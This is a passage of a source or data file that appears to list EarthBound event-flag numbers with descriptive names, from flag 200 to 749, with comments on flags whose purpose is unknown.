200: 'GOT_MOM_PHONE',
201: 'GOT_ESCARGO_EXPRESS_PHONE',
202: 'GOT_MACH_PIZZA_PHONE',
203: 'GOT_STOIC_CLUB_PHONE',
204: 'FLYING_MAN_1_DEAD',
205: 'FLYING_MAN_2_DEAD',
206: 'FLYING_MAN_3_DEAD',
207: 'FLYING_MAN_4_DEAD',
208: 'FLYING_MAN_5_DEAD',
209: 'VISITED_ONETT',
210: 'VISITED_TWOSON',
211: 'VISITED_THREED',
212: 'VISITED_WINTERS',
213: 'VISITED_SATURN_VALLEY',
214: 'VISITED_FOURSIDE',
215: 'VISITED_SUMMERS',
216: 'VISITED_DALAAM',
217: 'VISITED_SCARABA',
218: 'VISITED_DEEP_DARKNESS',
219: 'VISITED_TENDA_VILLAGE',
220: 'VISITED_UNDERWORLD',
221: 'UNUSED_BRAIN_FOOD_LUNCH',
222: 'UNUSED_REFRESHING_HERB',
223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',
224: 'SHOP_SOLD_OLD_EQUIPMENT',
225: 'SHOP_SOLD_ITEM',
# 226 (I hate multipurpose flags)
# 227 (I hate multipurpose flags)
# 228 (I hate multipurpose flags)
# 229 (I hate multipurpose flags)
# 230 (I hate multipurpose flags)
# 231 (I hate multipurpose flags)
# 232 (I hate multipurpose flags)
# 233 (I hate multipurpose flags)
234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN',
235: 'SHOP_BURGLIN_PARK_JAMAICAN',
236: 'SHOP_BURGLIN_PARK_BAKERY',
237: 'SHOP_BURGLIN_PARK_CONDIMENTS',
238: 'SHOP_BURGLIN_PARK_BANANA_LADY',
239: 'SHOP_HH_DRUGSTORE_CONSUMABLES',
240: 'SHOP_HH_DRUGSTORE_EQUIPMENT',
241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT',
242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES',
243: 'SHOP_THREED_ARMS_DEALER',
244: 'SHOP_THREED_BAKERY',
245: 'SHOP_WINTERS_DRUGSTORE',
246: 'SHOP_LAB_CAVE_BOY',
247: 'SHOP_GRAPEFRUIT_FALLS',
248: 'SHOP_SATURN_EQUIPMENT',
249: 'SHOP_SATURN_PENDANTS',
250: 'SHOP_SATURN_CONSUMABLES',
251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT',
252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES',
253: 'SHOP_DESERT_MINE',
254: 'SHOP_DESERT_ARMS_DEALER',
255: 'SHOP_FOURSIDE_BAKERY',
256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',
257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',
258: 'SHOP_FOURSIDE_DEPT_BAKERY',
259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS',
260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS',
261: 'SHOP_FOURSIDE_DEPT_BURGER',
262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS',
263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',
264: 'SHOP_FOURSIDE_PUNK_GUY',
265: 'SHOP_SUMMERS_SHOP',
266: 'SHOP_SUMMERS_RESTAURANT',
267: 'SHOP_TOTO_SHOP',
268: 'SHOP_SUMMERS_GELATO',
269: 'SHOP_MAGIC_CAKE_LADY',
270: 'SHOP_DALAAM_RESTAURANT',
271: 'SHOP_SCARABA_HASSANS_SHOP',
272: 'DIAMOND_TO_BE_DELIVERED',
273: 'MU_TRAINING_COMPLETE',
274: 'DUNGEON_MAN_AT_PALM_TREES',
275: 'LEARNED_TELEPORT',
276: 'MASTER_BARF_DEFEATED',
277: 'GUARDIAN_MOLE_1_DEFEATED',
278: 'GUARDIAN_MOLE_2_DEFEATED',
279: 'GUARDIAN_MOLE_3_DEFEATED',
280: 'GUARDIAN_MOLE_4_DEFEATED',
281: 'GUARDIAN_MOLE_5_DEFEATED',
# 282 (Five moles defeated? How does this differ from 72?)
# 283 (???)
284: 'PEACEFUL_REST_PENCIL_ERASED',
285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',
# 286 (???)
# 287 (Something about Lake Tess color palette)
288: 'USED_HAWK_EYE',
289: 'ONETT_COP_1_DEFEATED',
290: 'ONETT_COP_2_DEFEATED',
291: 'ONETT_COP_3_DEFEATED',
292: 'ONETT_COP_4_DEFEATED',
293: 'ONETT_COP_5_DEFEATED',
294: 'APPLE_MOUSE_BLOCKING_DOOR',
295: 'NESS_HOUSE_DOOR_KNOCKING',
296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room
297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room
298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room
299: 'IRON_ERASER_ERASED',
300: 'ZOMBIE_GUARDS_AWAY',
301: 'POKEY_WAITING_AT_DOOR',
# 302 (???)
303: 'BUZZ_BUZZ_DYING_ON_FLOOR',
304: 'KING_AWAKE_AT_HOME',
# 305 (???)
306: 'LIER_INSIDE_CAVE_3',
307: 'LIER_INSIDE_CAVE_4',
308: 'LIER_BY_MANI_MANI',
309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED',
310: 'POKEY_WAITING_AT_COUCH',
311: 'WINTERS_ROPE_LOWERED',
312: 'GHOSTS_BLOCKING_THREED',
# 313 (Unknown. Something about the City Bus?)
# 314 (Unknown. Something about the Runaway Five Bus?)
315: 'GHOSTS_BLOCKING_TWOSON',
# 316 (Unknown. Something about the City Bus?)
317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED',
318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM',
319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',
# 320 (???)
# 321 (Something about Paula's Dad acknowledging the kidnapping)
322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME',
323: 'GOT_PAK_OF_BUBBLE_GUM',
324: 'SHOP_RED_SNAKE',
325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',
326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER',
327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',
328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1',
329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',
330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT',
331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2',
332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT',
333: 'DESERT_MINE_BULLDOZER_MOVED',
334: 'BUBBLE_MONKEY_JOINS',
335: 'TONY_AT_BOARDING_SCHOOL_GATE',
336: 'GOT_KEY_TO_DUNGEON_MAN',
337: 'CALLED_STOIC_CLUB',
338: 'NEAR_WINTERS_ROPE',
339: 'APPLE_KID_NOT_AT_HIS_HOUSE',
# 340 (???)
341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',
342: 'PYRAMID_OPEN',
343: 'GOT_HIEROGLYPH_COPY',
344: 'LAKE_TESS_WIND_BLOWING',
# 345 (Related to Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels)
346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY',
347: 'PYRAMID_HOLE_OPEN',
348: 'GOT_HAWK_EYE',
349: 'JUST_WOKE_UP_FROM_MAGICANT',
350: 'USED_ELEVATOR',
351: 'HH_HQ_CULTIST_1_DEFEATED',
352: 'HH_HQ_CULTIST_2_DEFEATED',
353: 'HH_HQ_CULTIST_3_DEFEATED',
354: 'HH_HQ_CULTIST_4_DEFEATED',
355: 'HH_HQ_CULTIST_5_DEFEATED',
356: 'HH_HQ_CULTIST_6_DEFEATED',
357: 'SENTRY_ROBOT_1_DEFEATED',
358: 'SENTRY_ROBOT_2_DEFEATED',
359: 'SENTRY_ROBOT_3_DEFEATED',
360: 'SENTRY_ROBOT_4_DEFEATED',
361: 'SENTRY_ROBOT_5_DEFEATED',
362: 'SENTRY_ROBOT_6_DEFEATED',
363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED',
364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',
365: 'SHARK_AT_ARCADE_ABSENT',
366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT',
367: 'SLIMY_LITTLE_PILE_2_DEFEATED',
368: 'SLIMY_LITTLE_PILE_3_DEFEATED',
369: 'CAN_ENTER_BELCHS_FACTORY',
# 370 (Unknown. Related to traffic jam?)
# 371 (???)
372: 'PARTY_IS_ROBOTIFIED',
# 373 (Unknown. Related to Boogey Tent)
374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED',
375: 'PEOPLE_IN_ONETT',
# 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)
# 377 (???)
# 378 (???)
379: 'ANDONUTS_AT_LAB_ABSENT',
# 380 (???)
# 381 (???)
382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT',
383: 'JUST_RESTED',
384: 'GOT_ALL_MELODIES',
385: 'GOT_CONTACT_LENS',
386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for this battle
387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED',
388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',
389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',
390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never fights you
391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and never fights you
392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED',
393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',
394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED',
395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED',
396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED',
397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED',
398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED',
399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED',
400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED',
401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED',
402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED',
403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',
404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED',
405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED',
406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED',
407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED',
408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',
409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED',
410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED',
411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED',
412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED',
413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED',
414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',
415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',
416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED',
417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',
418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED',
419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',
420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED',
421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED',
422: 'ONETT_DAYTIME',
423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',
424: 'TENDA_SHOP_PLAIN_ROLL_1',
425: 'TENDA_SHOP_PLAIN_YOGURT',
426: 'TENDA_SHOP_PLAIN_ROLL_2',
427: 'TENDA_SHOP_SPICY_JERKY',
428: 'TENDA_SHOP_BAG_OF_DRAGONITE',
429: 'TENDA_SHOP_TALISMAN_COIN',
430: 'TENDA_SHOP_HALL_OF_FAME_BAT',
# 431 (???)
432: 'DEBUG_SKIP_SANDWICH_DX',
433: 'ZOMBIE_CHICK_HOTEL_MUSIC',
434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might be responsible only for palette changes, maybe)
435: 'GUARDIAN_GENERAL_DEFEATED',
436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',
437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED',
438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',
439: 'GOT_MAGIC_TRUFFLE_1',
440: 'GOT_MAGIC_TRUFFLE_2',
441: 'GOT_MAGIC_TRUFFLE_3',
442: 'GOT_MAGIC_TRUFFLE_4',
443: 'GOT_MAGIC_TRUFFLE_5',
444: 'KING_JOINS',
445: 'TALKED_TO_BRICK_ROADS_HEAD',
446: 'FOR_SALE_SIGN_CUSTOMER_1',
# 447 (???)
# 448 (???)
449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE',
450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK',
451: 'MONKEY_CAVE_SKIP_SANDWICH',
452: 'MONKEY_CAVE_PICNIC_LUNCH',
453: 'MONKEY_CAVE_WET_TOWEL',
454: 'MONKEY_CAVE_PIZZA_1',
455: 'MONKEY_CAVE_PROTEIN_DRINK',
456: 'MONKEY_CAVE_PIZZA_2',
457: 'MONKEY_CAVE_HAMBURGER_1',
458: 'MONKEY_CAVE_HAMBURGER_2',
459: 'MONKEY_CAVE_KING_BANANA',
460: 'MONKEY_CAVE_HAMBURGER_3',
461: 'MONKEY_CAVE_FRESH_EGG',
462: 'MONKEY_CAVE_RULER',
463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY',
464: 'GOT_KING_BANANA',
# 465 (???)
466: 'PICKY_SLEEPING_AT_METEORITE',
# 467 (Unknown. Related to Ness's house door knocking?)
468: 'POKEYS_HOUSE_LOCKED',
469: 'POLICE_AT_METEORITE',
470: 'TALKED_TO_TRACY_AT_HER_ROOM',
471: 'TALKED_TO_MOM',
472: 'TALKED_TO_POKEY_AT_METEORITE',
473: 'TRACY_AT_HALLWAY',
474: 'NESS_MOM_OUTSIDE',
# 475 (Handles continue yes/no on death. TODO: Investigate)
476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP',
477: 'NESS_SLEEPING_AT_HIS_BED',
478: 'SHOP_SCARABA_CONDIMENTS',
479: 'PHOTO_NESS_HOUSE_AVAILABLE',
480: 'PHOTO_SCAM_HOUSE_AVAILABLE',
481: 'PHOTO_CYCLE_SHOP_AVAILABLE',
482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE',
483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE',
484: 'PHOTO_CHAOS_THEATER_AVAILABLE',
485: 'PHOTO_LAKE_TESS_AVAILABLE',
486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE',
487: 'PHOTO_THREED_CEMETERY_AVAILABLE',
488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE',
489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE',
490: 'PHOTO_CIRCUS_TENT_AVAILABLE',
491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE',
492: 'PHOTO_DESERT_MINE_AVAILABLE',
493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE',
494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',
495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE',
496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE',
497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE',
498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE',
499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE',
500: 'PHOTO_STONEHENGE_AVAILABLE',
501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE',
502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE',
503: 'PHOTO_SUMMERS_BEACH_AVAILABLE',
504: 'PHOTO_TOTO_AVAILABLE',
505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE',
506: 'PHOTO_PYRAMID_AVAILABLE',
507: 'PHOTO_SCARABA_OASIS_AVAILABLE',
508: 'PHOTO_DEEP_DARKNESS_AVAILABLE',
509: 'PHOTO_TENDA_VILLAGE_AVAILABLE',
510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',
511: 'GOT_TOWN_MAP',
512: 'HAS_EXIT_MOUSE',
513: 'ONETT_POST_METEORITE_MUSIC',
514: 'JUST_RESTED_AT_HOME',
515: 'FRANK_DEFEATED',
516: 'MONKEY_CAVE_PENCIL_ERASED',
517: 'NESS_ROOM_LIGHTS_ON',
518: 'GUARDIAN_MOLE_TEXT_1',
519: 'GUARDIAN_MOLE_TEXT_2',
520: 'GUARDIAN_MOLE_TEXT_3',
521: 'GUARDIAN_MOLE_TEXT_4',
# 522 (Multipurpose?)
# 523 (Multipurpose?)
524: 'YOUR_SANCTUARY_MUSIC',
# 525 (???)
526: 'NEAR_BLUE_GEYSER_1',
527: 'NEAR_RED_GEYSER',
528: 'NEAR_BLUE_GEYSER_2',
# 529 (???)
530: 'TRACY_NOT_AT_HER_ROOM',
531: 'TRACY_DOWNSTAIRS',
532: 'NESS_ROOM_METEORITE_FALLING_MUSIC',
533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',
534: 'CITY_BUS_MUSIC',
535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC',
536: 'RUNAWAY_FIVE_FREE_MUSIC',
537: 'TESSIE_MUSIC',
# 538 (???)
539: 'GIVEN_PLAYERS_NAME',
# 540 (???)
541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR',
542: 'SAILING_OR_SUBMARINE_MUSIC',
543: 'SAILING_POST_KRAKEN_MUSIC',
544: 'WINTERS_MUSIC',
545: 'LAST_MELODY_AT_LILLIPUT_STEPS',
546: 'LAST_MELODY_AT_MILKY_WELL',
547: 'LAST_MELODY_AT_PINK_CLOUD',
548: 'LAST_MELODY_AT_FIRE_SPRING',
549: 'QUEUE_OUTSIDE_CHAOS_THEATER',
550: 'GOT_SUPORMA',
551: 'GAVE_FOOD_TO_APPLE_KID',
552: 'GOT_ZOMBIE_PAPER',
553: 'GOT_BACKSTAGE_PASS',
554: 'GOT_YOGURT_DISPENSER',
555: 'FOURSIDE_DEPT_LIGHTS_OUT',
556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED',
557: 'READY_TO_SAIL_TO_SCARABA',
558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP',
559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP',
560: 'HIDE_ONETT_HOTEL_TOWN_MAP',
561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP',
562: 'HIDE_ONETT_BAKERY_TOWN_MAP',
563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP',
564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',
565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP',
566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',
567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP',
568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',
569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP',
570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP',
571: 'HIDE_THREED_HOTEL_TOWN_MAP',
# 572 (???)
573: 'HIDE_THREED_BAKERY_TOWN_MAP',
574: 'HIDE_THREED_HOSPITAL_TOWN_MAP',
575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP',
576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP',
577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP',
578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',
579: 'HIDE_SCARABA_HOTEL_TOWN_MAP',
580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP',
581: 'HIDE_SCARABA_SHOP_TOWN_MAP',
582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP',
583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP',
584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',
585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP',
586: 'HIDE_TOTO_SHOP_TOWN_MAP',
587: 'FLYING_MAN_MUSIC',
# 588 (Visibility flag for someone in Threed?)
# 589 (Visibility flag for some Hotel Attendant?)
590: 'HAPPY_THREED_PEOPLE',
591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
593: 'POO_TELEPORTING_TO_SUMMERS',
594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM
595: 'STAR_MASTER_NEXT_TO_MU',
# 596 (???)
597: 'SHOP_SCARABA_BAZAAR_FOOD',
598: 'SHOP_SCARABA_WATER',
599: 'SHOP_SOUTH_SCARABA_VARIETY',
600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',
601: 'SHATTERED_MAN_1_DEFEATED',
602: 'SHATTERED_MAN_2_DEFEATED',
603: 'MINI_BARF_DEFEATED',
604: 'GOT_KEY_TO_THE_LOCKER',
605: 'USED_KEY_TO_THE_LOCKER',
606: 'DUNGEON_MAN_OPEN',
# 607 (Unknown. Related to desert mine?)
608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT',
609: 'WINTERS_PENCIL_ERASED',
610: 'DETECTIVE_IN_THREED',
# 611 (Something about talking to Paula's dad and not talking to Everdred)
612: 'EVERDRED_NOT_AT_ROOF',
613: 'TELEPORT_MONKEY_NOT_AT_CAVE',
614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE',
615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',
616: 'TENDAKRAUT_STOLEN',
617: 'MAGIC_CAKE_LADY_AT_BEACH',
618: 'GOT_ERASER_ERASER',
    # 619 (Unknown. Related to Stonehenge Base)
620: 'APPLE_MOUSE_AT_WINTERS_LAB',
621: 'MONKEYS_AT_WINTERS_LAB',
622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS',
623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',
624: 'EVERDRED_AT_HIS_HOUSE',
# 625 (Something about "Fancy Pokey" in the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli Building?
626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT',
627: 'TRACY_HAS_SOUND_STONE',
628: 'PRESENTS_AT_SATURN_VALLEY',
629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT',
630: 'BUBBLE_MONKEY_AT_LAKE_TESS',
631: 'TALKED_TO_MOONSIDE_MONOTOLI',
632: 'MONSTERS_IN_ONETT',
633: 'LIERS_HOUSE_UNLOCKED',
634: 'PAULA_TELEPATHY_DREAM_1',
635: 'PAULA_TELEPATHY_DREAM_2',
636: 'PAULA_TELEPATHY_DREAM_JEFF',
637: 'POO_AT_HIS_PALACE',
638: 'PAULA_AT_HER_ROOM',
639: 'TALKED_TO_MAGICANT_EVERDRED',
640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP',
641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',
642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP',
643: 'READY_TO_LOOK_AT_PHOTO_ALBUM',
644: 'GOT_SATURN_RIBBON',
645: 'ESCARGO_EXPRESS_PICK_UP',
646: 'FOR_SALE_SIGN_CUSTOMER_2',
647: 'FOR_SALE_SIGN_CUSTOMER_3',
648: 'FOR_SALE_SIGN_CUSTOMER_4',
649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',
650: 'GOT_MONKEYS_LOVE',
651: 'UNDERWORLD_TENDA_GATE_OPEN',
652: 'USED_CARROT_KEY',
653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER',
654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE',
655: 'SKY_RUNNER_MUSIC',
656: 'ALT_BUY_SOUND_EFFECT',
657: 'BOUGHT_OR_SOLD_AT_SHOP',
658: 'BOUGHT_WEAPON',
659: 'MOONSIDE_SWITCH_YES_NO',
660: 'ALT_NO_TALK_TEXT',
661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC',
662: 'DUNGEON_MAN_DESERT_MUSIC',
663: 'RETURNED_SHYNESS_BOOK',
664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT',
665: 'GOT_LETTER_FROM_MOM',
666: 'GOT_LETTER_FROM_TONY',
667: 'GOT_LETTER_FROM_KIDS',
668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT',
669: 'FLY_HONEY_TRASH_CAN_VISIBLE',
670: 'GOT_FOR_SALE_SIGN',
# 671 (???)
672: 'POKEY_FLIES_AWAY_BY_HELICOPTER',
673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',
674: 'HIDE_SCARABA_FOOD_TOWN_MAP',
675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY',
676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP',
677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP',
678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP',
# 679 (Something about Venus show about to start?)
# 680 (Something about Venus show about to start?)
681: 'SHOW_ONETT_HINT_TOWN_MAP',
682: 'SHOW_TWOSON_HINT_TOWN_MAP',
683: 'SHOW_THREED_HINT_TOWN_MAP',
684: 'SHOW_FOURSIDE_HINT_TOWN_MAP',
685: 'SHOW_SUMMERS_HINT_TOWN_MAP',
686: 'SHOW_SCARABA_HINT_TOWN_MAP',
687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING',
688: 'HAS_CALLED_MOM',
689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA',
690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER',
691: 'POO_LEFT_WITH_HAWK_EYE',
692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER',
693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE',
694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',
695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY',
696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',
697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',
698: 'GOT_PHOTO_NESS_HOUSE',
699: 'GOT_PHOTO_SCAM_HOUSE',
700: 'GOT_PHOTO_CYCLE_SHOP',
701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY',
702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',
703: 'GOT_PHOTO_CHAOS_THEATER',
704: 'GOT_PHOTO_LAKE_TESS',
705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON',
706: 'GOT_PHOTO_THREED_CEMETERY',
707: 'GOT_PHOTO_GRAPEFRUIT_FALLS',
708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',
709: 'GOT_PHOTO_CIRCUS_TENT',
710: 'GOT_PHOTO_BLACK_SESAME_SEED',
711: 'GOT_PHOTO_DESERT_MINE',
712: 'GOT_PHOTO_FOURSIDE_BRIDGE',
713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE',
714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',
715: 'GOT_PHOTO_MONOTOLI_BUILDING',
716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE',
717: 'GOT_PHOTO_POOS_PALACE_INSIDE',
718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE',
719: 'GOT_PHOTO_STONEHENGE',
720: 'GOT_PHOTO_SUMMERS_HOTEL',
721: 'GOT_PHOTO_FOURSIDE_RESTAURANT',
722: 'GOT_PHOTO_SUMMERS_BEACH',
723: 'GOT_PHOTO_TOTO',
724: 'GOT_PHOTO_SCARABA_BAZAAR',
725: 'GOT_PHOTO_PYRAMID',
726: 'GOT_PHOTO_SCARABA_OASIS',
727: 'GOT_PHOTO_DEEP_DARKNESS',
728: 'GOT_PHOTO_TENDA_VILLAGE',
729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',
730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE',
731: 'SHOP_UNDERWORLD_TENDA',
732: 'SHOP_MAGICANT',
733: 'SHOP_MOONSIDE',
734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE',
735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER',
736: 'GOT_PAIR_OF_DIRTY_SOCKS',
737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',
738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE',
739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL',
740: 'PEOPLE_IN_THREED_ABSENT',
741: 'MONOTOLI_AT_48TH_FLOOR',
742: 'LARDNA_AT_HOME',
743: 'VISITED_HAPPY_HAPPY_VILLAGE',
744: 'TALKED_TO_CARPAINTER',
745: 'QUEST_TO_YOGURT_MACHINE',
746: 'SCAM_HOUSE_UNLOCKED',
# 747 (??? Something about Runaway Five Tour Bus???)
748: 'SKY_RUNNER_AT_WINTERS_LAB',
749: 'NESS_WEARING_PAJAMAS',
